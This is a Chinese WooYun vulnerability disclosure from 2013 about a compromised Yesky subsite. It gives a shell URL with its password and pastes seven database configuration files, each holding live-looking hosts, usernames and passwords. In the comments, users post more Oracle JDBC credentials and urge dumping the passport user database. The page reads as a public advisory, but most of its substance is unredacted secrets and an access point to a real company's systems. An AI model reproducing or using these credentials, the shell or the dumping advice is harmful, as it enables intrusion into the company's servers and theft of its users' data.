当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2013-34057

漏洞标题: 天极网某站getshell导致N多数据库泄露

相关厂商: 天极传媒集团

漏洞作者: mango

提交时间: 2013-08-11 08:33

公开时间: 2013-08-16 08:33

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php+数字类型注射 Mysql asp+sqlserver注射

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-11: 细节已通知厂商并且等待厂商处理中
2013-08-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

= = 唉、、、

详细说明:

对于天极没什么好说的。。作为一名白帽子职责看到你们漏洞不忍心不提交

http://wpfree.yesky.com/plus/mytag_js.php?aid=9090 dedecms 密码是guige

1.jpg



1 (1).jpg



gdedecms的getshell不用多说了。。。说一下大量数据库吧

code 区域
<?php
//数据库连接信息
$cfg_dbhost = '10.10.10.150';
$cfg_dbname = 'wpfree';
$cfg_dbuser = 'wpfree';
$cfg_dbpwd = 'sw8MeIDXlXPmq3x5';
$cfg_dbprefix = 'dede_';
$cfg_db_language = 'gbk';


?>



code 区域
<?php 
define('UC_DBHOST', '10.10.10.150');
define('UC_DBUSER', 'sony');
define('UC_DBPW', 'sony');
define('UC_DBNAME', 'uchome');
define('UC_DBCHARSET', 'gbk');
define('UC_DBTABLEPRE', 'cdb_uc_')



code 区域
$dbhost = '219.239.88.150';		// 数据库服务器

$dbuser = 'faq'; // 数据库用户名

$dbpw = 'K#f*k2G0odmD'; // 数据库密码

$dbname = 'faq'; // 数据库名

$adminemail = 'admin@your.com'; // 系统 Email

$dbreport = 0; // 是否发送数据库错误报告? 0=否, 1=是



code 区域
$dbhost = '219.239.88.150';	// 数据库服务器
$dbuser = 'bbs'; // 数据库用户名
$dbpw = 'kena+bC-75wNuUbb'; // 数据库密码
$dbname = 'ask'; // 数据库名
$dbcharset = 'gbk'; // MySQL 字符集



code 区域
// ----------------------------  CONFIG DB  ----------------------------- //
$_config['db']['1']['dbhost'] = '10.10.10.150';
$_config['db']['1']['dbuser'] = 'autobbs';
$_config['db']['1']['dbpw'] = 'sw8MeIDXlXPmq3x5';
$_config['db']['1']['dbcharset'] = 'gbk';



code 区域
<?php
//数据库配置信息
//define('DB_HOST','localhost');
//define('DB_USER','root');
//define('DB_PW','123456');
//define('DB_NAME','myjob');
define('DB_HOST','219.239.88.245');
define('DB_USER','dbact');
define('DB_PW','zac@1WS09ZHDtre#');
define('DB_NAME','dbact');
define('DB_CHARSET','GBK');
define("DB_PCONNECT",0);
define('DB_DATABASE','mysql');
define('DB_PRE',"tab_");
?>



code 区域
<?php

//定义数据库相关常量
define('DBHOST', '10.10.10.150');//数据库主机名
define('DBUSER', 'week');//用户名
define('DBPW', 'Nz2CrRNkciq3a');//密码
define('DBNAME', 'WEEKLYREPORT');//数据库名
define('DBCHARSET', 'gbk');//数据库字符集


//define('DBHOST', 'localhost');//数据库主机名
//define('DBUSER', 'root');//用户名
//define('DBPW', '1209');//密码
//define('DBNAME', 'weeklyreport');//数据库名
//define('DBCHARSET', 'gbk');//数据库字符集

//定义每页显示记录条数
define('pagesize',15);









漏洞证明:

我只找到这么多、、、你们自己看着修吧、、我也不多说了

1.jpg



1 (1).jpg







还有一句话。。。我没脱裤哦、

修复方案:

换CMS吧

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-08-16 08:33

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-08-11 09:40 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)
    1

    机油〜我刚到学校就看见你调皮了.

  2. 2013-08-11 09:45 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    1

    @Spid3r - -@天极传媒集团 这位厂商你每次发送礼物有一次到了么??? 厂商要有节操的、、、、

  3. 2013-08-11 09:46 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    @Spid3r 基友什么时候上电脑 我有一个注入。。。求教

  4. 2013-08-11 09:48 | Spid3r ( 实习白帽子 | Rank:50 漏洞数:10 | 常年撒网打鱼.)
    1

    机油,学校寝室线路改装中〜没空调,没网,没电视〜靠流量勉强维持生计:(

  5. 2013-08-11 11:17 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)
    0

    @Spid3r 基友,求暖床!

  6. 2013-08-11 12:28 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)
    0

    @mango 节操啊~ .................................................................................

  7. 2013-08-16 09:37 | LauRen ( 路人 | Rank:4 漏洞数:1 | 苦逼屌丝一枚。)
    0

    楼主脱了吧

  8. 2013-08-16 09:44 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    @LauRen = =我要是知道他不确认早知道就脱了、艹

  9. 2013-08-16 10:19 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )
    1

    又不是主站 又不是会员数据库

  10. 2013-08-16 10:20 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )
    0

    cms.jdbc.url=jdbc\:oracle\:thin\:@219.239.88.85\:1521\:orcl cms.jdbc.username=newcms4iuser cms.jdbc.password=cms4i jdbc:oracle:thin:@othersdb.yesky.com:1521:othersdb user=gdplayuser password=gdplay JDBCConnectionURL=jdbc:oracle:thin:@passportdb.yesky.com:1521:orcl user=I0405CasUser password=I0405Cas jdbc.driverClassName=oracle.jdbc.driver.OracleDriver jdbc.url=jdbc:oracle:thin:@219.239.88.48:1521:othersdb jdbc.username=gdplayuser jdbc.password=gdplay

  11. 2013-08-16 10:21 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )
    0

    passportdb.yesky.com 要脱就去脱这个库

  12. 2013-08-16 10:21 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    1

    @北洋贱队 碉堡了、、、、

  13. 2013-08-16 21:49 | gmax ( 路人 | Rank:2 漏洞数:1 | .)
    0

    @Spid3r 基友,生活这么悲催?

  14. 2014-04-07 13:40 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)
    0

    卧槽,难道没脱裤。。。

登录后才能发表评论,请先 登录